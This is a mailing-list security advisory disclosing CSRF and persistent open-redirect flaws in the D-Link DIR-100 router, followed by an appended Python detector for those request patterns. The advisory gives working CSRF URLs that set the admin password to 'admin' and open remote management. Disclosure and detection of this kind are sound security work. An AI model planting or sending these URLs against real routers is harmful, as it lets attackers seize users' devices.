List: full-disclosure
Subject: [FD] New vulnerabilities in D-Link DIR-100
From: "MustLive" <mustlive () websecurity ! com ! ua>
Date: 2018-01-31 17:03:13
Message-ID: 00d901d39ab5$6da6c380$6600a8c0 () pc
Hello list!
There are Cross-Site Request Forgery and URL Redirector Abuse
vulnerabilities in D-Link DIR-100. This is my second advisory for DIR-100.
-------------------------
Affected products:
-------------------------
The following model is vulnerable: D-Link DIR-100, Firmware v1.01. All other
versions must also be vulnerable.
----------
Details:
----------
Cross-Site Request Forgery (WASC-09):
Change admin's password:
http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin
Turn on Remote Management:
http://site/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80
CSRF attack to change admin's password and turn on Remote Management:
http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin&SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80
URL Redirector Abuse (WASC-38):
http://site/Tools/vs.htm?location=http://www.google.com
This is a Persisted Redirector attack. After an address is set in the location
parameter, it is saved, and later on it is possible to redirect just by visiting
the page http://site/Tools/vs.htm.
I mentioned these vulnerabilities on my site
(http://websecurity.com.ua/8021/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
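
A defender-side check for the request patterns listed in the advisory, as an added example that is not part of the original message: it flags `SET/` requests to `tools_admin.xgi` whose Referer is absent or is not the router itself, and requests that store an off-device `location` in `vs.htm`. The host `router.example`, the function name `classify` and the sample requests are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qsl

ADMIN_PATH = "/Tools/tools_admin.xgi"  # path from the advisory
REDIRECT_PATH = "/Tools/vs.htm"        # path from the advisory


def classify(url, router_host, referer=None):
    """Return findings for one proxied GET request (heuristic, not a signature)."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    findings = []

    if parts.path == ADMIN_PATH:
        set_keys = [k for k, _ in params if k.startswith("SET/")]
        ref_host = urlsplit(referer).hostname if referer else None
        # A settings change whose Referer is absent or another site was not
        # started from the router's own admin pages.
        if set_keys and ref_host != router_host:
            findings.append(("csrf-suspect", set_keys))

    if parts.path == REDIRECT_PATH:
        for key, value in params:
            target = urlsplit(value).hostname
            if key == "location" and target and target != router_host:
                findings.append(("redirect-stored", [value]))

    return findings


# Constructed sample requests (hypothetical host router.example).
SAMPLES = [
    ("http://router.example/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1"
     "&SET/security/firewall/httpRemotePort=80", "http://forum.example/post/1"),
    ("http://router.example/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1",
     "http://router.example/"),
    ("http://router.example/Tools/vs.htm?location=http://www.google.com", None),
    ("http://router.example/Tools/vs.htm", "http://router.example/"),
]

if __name__ == "__main__":
    for url, referer in SAMPLES:
        print(classify(url, "router.example", referer) or "clean", "<-", url)
```

The same predicate can run over proxy or IDS logs that record the request URL and Referer for traffic to the device's LAN address.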